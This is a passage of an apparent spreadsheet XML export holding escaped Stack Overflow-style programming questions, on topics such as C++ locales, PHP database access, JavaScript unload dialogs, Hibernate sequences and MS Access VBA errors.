&lt;p&gt;I know that this is a thorny issue in C++, and I've been googling around to try and find a specific solution in the XCode case. A couple of things I found that it was suggested should work were:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
    std::cout.imbue( std::locale("") );
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
    std::setlocale(LC_ALL, "");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Neither of these have made any difference. Before I resign myself to spending the next couple of weeks studying the facets API just to be able to write to the console I thought I'd check with the esteemed audidence here.&lt;/p&gt;
&lt;p&gt;[Update]&lt;/p&gt;
&lt;p&gt;I think the reason for the problem I've been having is actually to do with the specific encoding of some of the strings I'm trying to print.&lt;/p&gt;
&lt;p&gt;If I send just a string literal, using the &lt;code&gt;L"my string" syntax&lt;/code&gt; it works! It appears this is using UTF32 - little endian encoding.&lt;/p&gt;
&lt;p&gt;However, I've been mixing this with strings I've been passed from Objective C++ code using NSUTF32BigEndianStringEncoding encoding. It's this mix of encodings that's causing the problems.&lt;/p&gt;
&lt;p&gt;I think we can consider this matter closed. Thanks for reading.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>_configthreadlocale and localeconv</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As we all know, global data, like the locale settings affecting the numeric decimal point printf() and strtod() are using, is evil. Fortunately, MSVC++ 9 allows to use per-thread locales by a &lt;code&gt;_configthreadlocale(_ENABLE_PER_THREAD_LOCALE)&lt;/code&gt; call. Unfortunately, it seems that the localeconv() function does not notice this and still returns the global locale settings, e.g. localeconv()-&gt;decimal_point seems to always return the global locale setting before the _configthreadlocale() call. Is this a bug in the MSVC library or is this expected?&lt;/p&gt;
&lt;p&gt;TIA
Paavo&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you connect/retrieve data from a MYSQL database using objects in PHP?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Generally I connect and retrieve data using the standard way (error checking removed for simplicity):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$db = mysql_select_db("dbname", mysql_connect("host","username","passord"));
$items = mysql_query("SELECT * FROM $db");
while($item = mysql_fetch_array($items)) {
    my_function($item[rowname]);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Where my_function does some useful things witht that particular row.&lt;/p&gt;
&lt;p&gt;What is the equivalent code using objects?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Server monitoring and alerting software?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What software does everyone use to monitor hardware? I know about nagios and cacti, but does anyone use any other software?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there an OpenID 2.0 plugin for Symfony?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using sfOpenID plugin for Symfony, which doesn't support OpenID 2.0. That means, for example, that people using Yahoo! OpenID can't login to my site.&lt;/p&gt;
&lt;p&gt;There is an OpenID 2.0 plugin that works with sfGuard, but I am not using nor planning to use sfGuard. Plus, it requires to install Zend framework, too, which is an overkill in my scenario.&lt;/p&gt;
&lt;p&gt;So I've got two questions, really:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;is there another OpenID plugin for Symfony supporting OpenID 2.0?&lt;/li&gt;
&lt;li&gt;what would be the hack required to make sfOpenID support OpenID 2.0?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I suppose I could study OpenID specs and hack it myself, but then, I am a lazy programmer :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to measure parse time in PHP?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Optimization of PHP code via runtime benchmarking is straight forward.  Keep track of $start and $end times via microtime() around a code block - I am not looking for an answer that involves microtime() usage.&lt;/p&gt;
&lt;p&gt;What I would like to do is measure the time it takes PHP to get prepared to run it's code - code-parse/op-code-tree-building time.  My reasoning is that while it's easy to just include() every class that you &lt;strong&gt;might&lt;/strong&gt; need for every page that you have on a site, the CPU overhead can't be "free".  I'd like to know how "expensive" parse time really is.&lt;/p&gt;
&lt;p&gt;I am assuming that an opcode cache such as APC is &lt;strong&gt;not&lt;/strong&gt; part of the scenario.&lt;/p&gt;
&lt;p&gt;Would I be correct that measurement of parse time in PHP is something that would have to take place in mod_php?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT&lt;/strong&gt;:  If possible, taking into account &lt;code&gt;$_SERVER['DOCUMENT_ROOT']&lt;/code&gt; usage in code would be helpful.  Command solutions might take a bit of tinkering to do this (but still be valuable answers).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Multi file upload with PHP/Javascript and no flash</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to make a webpage that allows the uploading of multiple files at the same times. I will limit the file extensions to the most common images like JPG, JPEG, PNG and GIF.&lt;/p&gt;
&lt;p&gt;I've done some research on this and everywhere I look it's flash this and flash that.&lt;/p&gt;
&lt;p&gt;I don't want to use flash really. Especially with Flash 10, which disables the most common used method to enable multifile upload.&lt;/p&gt;
&lt;p&gt;What I'm looking for is a way to keep creating more and more input fields, each with a browse button and then with one final upload button at the bottom of the form. Creating the new input fields with a Javascript is nog big deal really.&lt;/p&gt;
&lt;p&gt;So I'm wondering how this works. Do I need to give all file-input fields the same name atribute so I can use 1 piece of PHP code to solve this? Or Is there some way for PHP to detect howmany files have been sumbitted and simply put the code for parsing a file inside a for-loop?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I place a MFC CFormView inside a CDockablePane?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I place a MFC CFormView inside a CDockablePane which was introduced in the VS 2008 MFC Feature Pack?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>iPhone UIwebview with embedded quicktime video?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When I load a HTML page with a .MOV embedded video on my App using a UIWebview it appears a broken icon, any idea? The same HTML page on Iphone Safari works fine and the media player is started without problem...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Preventing Duplicate Inserts Into SQL With PHP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm going to running thousands of queries into SQL and I need to prevent the duplication of field 'domain'. Never had to do this before and any help would be appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Level of database rebuilding in a daily build routine</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am in the process of designing a daily build routine for my project.  We are using Flex 3 and SQL Server 2005.  I am unsure to what degree I should be rebuilding the database on a daily build.  Should I be dropping all tables and stored procedures and adding them back in?  Then I would have to have a script that put all the default data back into the tables.&lt;/p&gt;
&lt;p&gt;Or should I have the DBA write Alter scripts that only run when changes are made and concentrate on building the code on a daily basis?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to develop *real life* oop skills?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been studying OOP for quite a while now and I have a good grasp of the theory.  I read the &lt;a href="http://rads.stackoverflow.com/amzn/click/0596008678"&gt;Head First&lt;/a&gt; book on OOP and, while it reinforced a lot of the theory, I found the case studies to be somewhat trivial.&lt;/p&gt;
&lt;p&gt;I find that I'm applying OOP principles to my code each day, but I'm not sure if I'm applying them correctly.  I need to get to the point where I am able to look at my code and know whether I'm using inheritance appropriately, whether my object is cohesive enough, etc.&lt;/p&gt;
&lt;p&gt;Does anyone have any good recommendations (books, online guides, blogs, walk-throughs, etc.) for taking the next step in developing solid OOP skills?&lt;/p&gt;
&lt;p&gt;I am working primarily in .NET (visual basic), but I welcome suggestions that incorporate various platforms.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I override the OnBeforeUnload dialog and replace it with my own?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to warn users about unsaved changes before they leave a page (a pretty common problem). &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;window.onbeforeunload=handler
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This works but it raises a default dialog with an irritating standard message that wraps my own text. I need to either completely replace the standard message, so my text is clear, or (even better) replace the entire dialog with a modal dialog using jQuery.&lt;/p&gt;
&lt;p&gt;So far I have failed and I haven't found anyone else who seems to have an answer. Is it even possible?&lt;/p&gt;
&lt;p&gt;Javascript in my page:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;script type="text/javascript"&amp;gt;   
   window.onbeforeunload=closeIt;
&amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The closeIt() function:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function closeIt()
{
  if (changes == "true" || files == "true")
  {
      return "Here you can append a custom message to the default dialog.";
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Using jQuery and jqModal I have tried this kind of thing (using a custom confirm dialog):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$(window).beforeunload(function() {
        confirm('new message: ' + this.href + ' !', this.href);
        return false;
    });
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;which also doesn't work - I cannot seem to bind to the beforeunload event. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to get a list of added or deleted files from Subversion?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to retrieve a list of the files that has been added or deleted from our Subversion repository over, for example, the last month.&lt;/p&gt;
&lt;p&gt;I'd prefer to have the file names, and not just a count.&lt;/p&gt;
&lt;p&gt;Is this possible from the Subversion command line, or would I need to use a script to trawl the log?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Making an Image Greyscale with GD Library</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My mission is to create a little app where you can upload a picture, and the app will turn it into ASCII art. I'm sure these exist already but I want to prove that I can do it myself.&lt;/p&gt;
&lt;p&gt;This would involve taking an image, making it greyscale and then matching each pixel with a character depending on how dark the picture is and how full the character is.&lt;/p&gt;
&lt;p&gt;So my question is, Using the GD Library (or i guess some other means if necessary) how do I make an image black and white?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How would I express this Scheme function more clearly?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;(define (repeated f n)
   if (= n 0)
   f
   ((compose repeated f) (lambda (x) (- n 1))))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I wrote this function, but how would I express this more clearly, using simple recursion with repeated?&lt;/p&gt;
&lt;p&gt;I'm sorry, I forgot to define my compose function.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;(define (compose f g) (lambda (x) (f (g x))))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And the function takes as inputs a procedure that computes f and a positive integer n and returns the procedure that computes the nth repeated application of f.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET MVC and Ajax</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;From what I've read about ASP.NET MVC, it appears it requires posting to work, is there any working example (With source available) of a ASP.NET MVC website that has no postbacks with the help of Ajax?&lt;/p&gt;
&lt;p&gt;(I checked the related questions earlier but couldn't find what I was looking for)&lt;/p&gt;
&lt;p&gt;Thanks in advance.&lt;/p&gt;
&lt;p&gt;edit: I need jQuery solutions not Atlas Toolkit stuff!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Detect another host with the same MAC address</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I detect if another host is using the same MAC address as the current host, e.g. because the other host is spoofing?&lt;/p&gt;
&lt;p&gt;I'm working in an embedded environment, so looking for answers on a protocol level, rather than â€œuse such and such a toolâ€.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit&lt;/strong&gt;: RARP does &lt;em&gt;not&lt;/em&gt; solve this problem. For RARP to get any reply at all, there has to be at least one host on the segment which supports RARP. Since RARP is obsolete, modern operating systems don't support it. Furthermore, all RARP can do is tell you your own IP address - the response won't be any different if thereâ€™s another host on the segment with the same MAC, unless that host has itself used a different IP address.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the benefits to marking a field as `readonly` in C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What are the benefits of having a member variable declared as read only?  Is it just protecting against someone changing during the lifecycle of the class or are there any compiler speed improvements due to this keyword&lt;/p&gt;
</t>
  </si>
  <si>
    <t>AccessControlException when attempting to delete a file</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a java web service application that uses log4j to do logging. An  exception gets thrown when log4j tries to delete its rolling log files&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Exception:java.security.AccessControlException: access denied
(java.io.FilePermission /var/opt/SUNWappserver/domains/domain1/
applications/j2ee-modules/ourwebservice/WEB-INF/logs/IMWrapper.log.10 delete)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When we do an &lt;code&gt;ls&lt;/code&gt; in the directory the service account does have access to read and write to the files and the directory.&lt;/p&gt;
&lt;p&gt;From some initial Googling it seems we may have to change the &lt;code&gt;security.policy&lt;/code&gt; file to allow the service to delete files. Any suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Define an Extension Method for IEnumerable&lt;T&gt; which returns IEnumerable&lt;T&gt;?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I define an Extension Method for &lt;code&gt;IEnumerable&amp;lt;T&amp;gt;&lt;/code&gt; which returns &lt;code&gt;IEnumerable&amp;lt;T&amp;gt;&lt;/code&gt;?
The goal is to make the Extension Method available for all &lt;code&gt;IEnumerable&lt;/code&gt; and &lt;code&gt;IEnumerable&amp;lt;T&amp;gt;&lt;/code&gt; where &lt;code&gt;T&lt;/code&gt; can be an anonymous type.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a good Python GUI shell?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I saw this the other day (scroll &lt;em&gt;all the way&lt;/em&gt; down to see some of the clever stuff): &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;&lt;a href="http://www.mono-project.com/docs/tools+libraries/tools/repl/" rel="nofollow"&gt;http://www.mono-project.com/docs/tools+libraries/tools/repl/&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;And wondered whether something like this exists for Python.&lt;/p&gt;
&lt;p&gt;So, is there a good Python GUI shell that can do stuff like that C# shell can do?&lt;/p&gt;
&lt;p&gt;Edit: Here are links to screenshots from the article, showing what I'm interested in doing.&lt;/p&gt;
&lt;p&gt;An example of the type of things I'm interested: &lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.mono-project.com/archived/images/7/75/GSharpPlot.png" rel="nofollow"&gt;http://www.mono-project.com/archived/images/7/75/GSharpPlot.png&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;They are able to add hooks to produce GUI elements like the plot, or even do silly things like:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.mono-project.com/archived/images/b/bf/GSharpRenderHandler.png" rel="nofollow"&gt;http://www.mono-project.com/archived/images/b/bf/GSharpRenderHandler.png&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I don't think this is possible with any of the console shells I've tried (the regular python shell, ipython).&lt;/p&gt;
&lt;p&gt;Edit: I'm not looking for an IDE. If you look at the link, you'll get an idea of what I want.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>I need to get the password which is Hashed in ASP.net</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am storing all my passwords in the form hashed. I need to retrieve these passwords
Eg&lt;/p&gt;
&lt;p&gt;My password is "123456" I save this as hashed "3453474852dfdsfdsfdf" value.&lt;/p&gt;
&lt;p&gt;I need to retrieve the original password from the hashed value. (Get Password).&lt;/p&gt;
&lt;p&gt;How can I do that?. I am doing SHA1 hashing algorithm.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way to transfer a file using Java?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am writing code for uploading a file from a client to my server and the performance isn't as fast as I think it should be.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;I have the current code snippet that is doing the file transfer and I was wondering how I could speed up the transfer.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Sorry about all of the code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;InputStream fileItemInputStream ;
OutputStream saveFileStream;
int[] buffer;
while (fileItemInputStream.available() &amp;gt; 0) {
    buffer = Util.getBytesFromStream(fileItemInputStream);
    Util.writeIntArrToStream(saveFileStream, buffer);
}
saveFileStream.close();
fileItemInputStream.close();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The Util methods are as follows:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public static int[] getBytesFromStream(InputStream in, int size) throws IOException {
    int[] b = new int[size];
    int count = 0;
    while (count &amp;lt; size) {
        b[count++] = in.read();
    }
    return b;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public static void writeIntArrToStream(OutputStream out, int[] arrToWrite) throws IOException {
    for (int i = 0; i &amp;lt; arrToWrite.length; i++) {
        out.write(arrToWrite[i]);
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>is it worth keeping the OS look and feel?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it worth to try to keep your GUI within the system looks ?&lt;/p&gt;
&lt;p&gt;Every major program have their own anyways...
(visual studio, iexplorer, firefox, symantec utilities, adobe ...)&lt;/p&gt;
&lt;p&gt;Or just the frame and dialogs should be left in the system look 'n feel range ?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;update:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;One easy exemple, if you want to add a close button to your tab, usually you make it against your current desktop theme. But if the user has a different theme, your close button is out of place, it doesn't fit the system look anymore.&lt;/p&gt;
&lt;p&gt;I played with the uxtheme api, but there is nothing much you can do, and some themes i've seen are incomplete sets.&lt;/p&gt;
&lt;p&gt;So to address this issue, the best way i see, is to do like visual studio/firefox/chrome roolup your own tab control with your theme...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MS Access: How to bypass/suppress an error?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm executing a query like this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;select field from table;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In that query, there is a loop running on many tables. So, if the field is not present in a table I get a &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Runtime Error 3061&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;How can I by pass this error such as that on this error flow should go to another point?&lt;/p&gt;
&lt;p&gt;This is the code I have recently after going through this forum.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Option Explicit
Private Sub UpdateNulls()
 Dim rs2 As DAO.Recordset
  Dim tdf As DAO.TableDef
  Dim db As Database
  Dim varii As Variant, strField As String
  Dim strsql As String, strsql2 As String, strsql3 As String
  Dim astrFields As Variant
  Dim intIx As Integer
  Dim field As Variant
  Dim astrvalidcodes As Variant
  Dim found As Boolean
  Dim v As Variant
  Open "C:\Documents and Settings\Desktop\testfile.txt" For Input As #1
  varii = ""
  Do While Not EOF(1)
    Line Input #1, strField
    varii = varii &amp;amp; "," &amp;amp; strField
  Loop
  Close #1
  astrFields = Split(varii, ",")  'Element 0 empty
        For intIx = 1 To UBound(astrFields)
        'Function ListFieldDescriptions()
                            Dim cn As New ADODB.Connection, cn2 As New ADODB.Connection
                            Dim rs As ADODB.Recordset, rs3 As ADODB.Recordset
                            Dim connString As String
                            Dim SelectFieldName
                            Set cn = CurrentProject.Connection
                            SelectFieldName = astrFields(intIx)
                            Set rs = cn.OpenSchema(adSchemaColumns, Array(Empty, Empty, Empty, SelectFieldName))
                           'Show the tables that have been selected '
                            While Not rs.EOF
                           'Exclude MS system tables '
                            If Left(rs!Table_Name, 4) &amp;lt;&amp;gt; "MSys" Then
                            strsql = "Select t.* From [" &amp;amp; rs!Table_Name &amp;amp; "] t Inner Join 01UMWELT On t.fall = [01UMWELT].fall Where [01UMWELT].Status = 4"
                            End If
                            Set rs3 = CurrentDb.OpenRecordset(strsql)
            'End Function
            strsql2 = "SELECT label.validcode FROM variablen s INNER JOIN label ON s.id=label.variablenid WHERE varname='" &amp;amp; astrFields(intIx) &amp;amp; "'"
            Set db = OpenDatabase("C:\Documents and Settings\Desktop\Codebook.mdb")
            Set rs2 = db.OpenRecordset(strsql2)
                With rs2
                .MoveLast
                .MoveFirst
                 astrvalidcodes = rs2.GetRows(.RecordCount)
                .Close '
                End With
                    With rs3
                    .MoveFirst
                    While Not rs3.EOF
                        found = False
                        For Each v In astrvalidcodes
                        If v = .Fields(0) Then
                        found = True
                        Debug.Print .Fields(0)
                        Debug.Print .Fields(1)
              Exit For
                    End If
                    Next
                If Not found Then
                msgbox "xxxxxxxxxxxxxxxx"
                End If
                End If
                .MoveNext
                Wend
                End With
           On Error GoTo 0        'End of special handling
    Wend
Next intIx
  End Sub
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm getting a&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Type Mismatch Runtime Error &lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;in &lt;code&gt;Set rs3 = CurrentDb.OpenRecordset(strsql)&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;I guess I'm mixing up &lt;code&gt;ado&lt;/code&gt; and &lt;code&gt;dao&lt;/code&gt; but I'm not certainly sure where it is.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MySql: MyISAM vs. Inno DB!</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What are the differences between MyISAM and Inno DB types in MySql?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I get Ltk to display what the user is writing and what the functions print?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The kind of functions are of the sort of:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;(defun display-all ()
  "Display all items in the database."
  (dolist (item *database*)
    (format t "~{~a:~10t~a~%~}~%" item)))
(defun prompt-read (prompt)
  (format *query-io* "~a: " prompt)
  (force-output *query-io*)
  (read-line *query-io*))
(defun prompt-for-item ()
  (make-database
   (prompt-read "Name")
   (prompt-read "Price")))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've read the Ltk documentation, but there doesn't seem to be any examples of text widget usage.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the best PDC 2008 videos that I need to look at?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Considering the full list of PDC videos published &lt;a href="http://channel9.msdn.com/posts/pdc2008/RSS/Default.aspx" rel="nofollow"&gt;here&lt;/a&gt; what are, in your opinion, the best session to download and see, considering their relevance to your work, technology and so on? Pleas, one session per answer (exception only for the sessions split in two parts) and please vote it so to move the best ones to the top.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the equivalent of the .NET Framework 2.0 SDK for the .NET Framework 3.5?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;On our build server, we've installed the .NET Framework 2.0 SDK in order to kick off MSBuild and run our builds. Now we are upgrading to the .NET Framework 3.5. We do not want to install the complete Visual Studio, but we cannot find a .NET Framework 3.5 SDK on the internet either?&lt;/p&gt;
&lt;p&gt;The question: What do we need ot download and install to get the equivalent of a .NET Framework 3.5 SDK installation?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Hibernate JPA Sequence (non-Id)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to use a DB sequence for some column that &lt;strong&gt;is not the identifier/is not part of a composite identifier&lt;/strong&gt;? &lt;/p&gt;
&lt;p&gt;I'm using hibernate as jpa provider, and I have a table that has some columns that are generated values (using a sequence), although they are not part of the identifier.&lt;/p&gt;
&lt;p&gt;What I want is to use a sequence to create a new value for an entity, where the column for the sequence is &lt;strong&gt;NOT&lt;/strong&gt; (part of) the primary key:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@Entity
@Table(name = "MyTable")
public class MyEntity {
    //...
    @Id //... etc
    public Long getId() {
        return id;
    }
   //note NO @Id here! but this doesn't work...
    @GeneratedValue(strategy = GenerationType.AUTO, generator = "myGen")
    @SequenceGenerator(name = "myGen", sequenceName = "MY_SEQUENCE")
    @Column(name = "SEQ_VAL", unique = false, nullable = false, insertable = true, updatable = true)
    public Long getMySequencedValue(){
      return myVal;
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then when I do this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;em.persist(new MyEntity());
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;the id will be generated, but the &lt;code&gt;mySequenceVal&lt;/code&gt; property will be also generated by my JPA provider.&lt;/p&gt;
&lt;p&gt;Just to make things clear: I want &lt;strong&gt;Hibernate&lt;/strong&gt; to generate the value for the &lt;code&gt;mySequencedValue&lt;/code&gt; property. I know Hibernate can handle database-generated values, but I don't want to use a trigger or any other thing other than Hibernate itself to generate the value for my property. If Hibernate can generate values for primary keys, why can't it generate for a simple property?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MOSS 2007: SPListItem.GetFormattedValue for DateTime fields has a bug?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;SPListItem.GetFormattedValue seems to have a strange behavior for DateTime fields.
It retrieves the DateTime value through SPListItem's indexer which according to this &lt;a href="http://msdn.microsoft.com/en-us/library/ms197282.aspx"&gt;MSDN article&lt;/a&gt; returns &lt;em&gt;local&lt;/em&gt; time.
Here's a snippet from Reflector&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public string GetFormattedValue(string fieldName)
{
    SPField field = this.Fields.GetField(fieldName);
    if (field != null)
    {
        return field.GetFieldValueAsHtml(this[fieldName]);
    }
    return null;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So it uses SPListItem's indexer to retrieve the value and than SPFields.GetFieldValueAsHtml to format the value. GetFieldValueAsHtml seems to assume the date is in UTC and convert it to local time no matter what kind it is. (Reflector shows that it uses GetFieldValueAsText which uses value.ToString() but for some reason it assumes the time to be UTC.)&lt;/p&gt;
&lt;p&gt;The end result is that the string representation on a time field obtained trough listItem.GetFormattedValue() (at least in my case) is incorrect, being local time + (local time - UTC).&lt;/p&gt;
&lt;p&gt;Have anybody encountered the same issue with SPListItem.GetFormattedValue() and what was your workaround?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Seen this binary date format?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;3/10/2008 = 1822556159&lt;/p&gt;
&lt;p&gt;2/10/2008 = 1822523391&lt;/p&gt;
&lt;p&gt;1/10/2008 = 1822490623&lt;/p&gt;
&lt;p&gt;30/09/2008 = 1822392319&lt;/p&gt;
&lt;p&gt;29/09/2008 = 1822359551&lt;/p&gt;
&lt;p&gt;This is all the information that I know at the current time. &lt;/p&gt;
&lt;p&gt;Dates increment by 32768 except when changing month when the increment is 32768 x 2 (65536).&lt;/p&gt;
&lt;p&gt;Has anyone seen this binary date format and how can I extract the correct date?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;It is possible that the remaining portion of the date is for time (hours, minutes, seconds)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>XPath vs DeSerialization: which one is better in performance for read operations</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm passing small (2-10 KB)XML documents as input to a WCF service. now I've two option to read data values from incoming XML&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Deserialize to a strongly typed object and use object properties to access values&lt;/li&gt;
&lt;li&gt;use XPath to access values&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;which approach is faster? some statistics to support your answer would be great.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Recurring Payments in PayPal</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to use the Recurring payment API offered by PayPal.
I have a scenario which I am not able to address directly. It goes like this.&lt;/p&gt;
&lt;p&gt;We have a website where we sell some services. Now the services are charged per user license. A user can buy/cancel user license in between. We want to offer the customer a recurring billing option. We have to notice here that the amount may vary each billing cycle based on the number of user licenses the customer uses during that cycle.&lt;/p&gt;
&lt;p&gt;Is there any way I can achieve this using PayPal recurring Payment API's.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Input Audio as a Stream in CF 3.5</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I googled around and coulnd't really find an answer.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;How do I open an audio input device&lt;/strong&gt; (namely a microphone) &lt;strong&gt;as a stream&lt;/strong&gt; (preferably) &lt;strong&gt;on a CE/WinMobile device using Compact Framework?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I looked at WindowsMobile.DirectX, at various classes that contained Audio in their name and nothing seemed to do the trick.&lt;/p&gt;
&lt;p&gt;What I want to do is basically to stream the audio input over the network to the server.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I run sql server stored procedures in parallel?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to do something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;exec sproc1 and sproc2 at the same time
when they are both finished exec sproc3
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I can do this in dts.
Is there a way to do it in transact sql?
Or is there a way to do it with a batch script (eg vbs or powershell)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I add custom column to existing WSS list template</t>
  </si>
  <si>
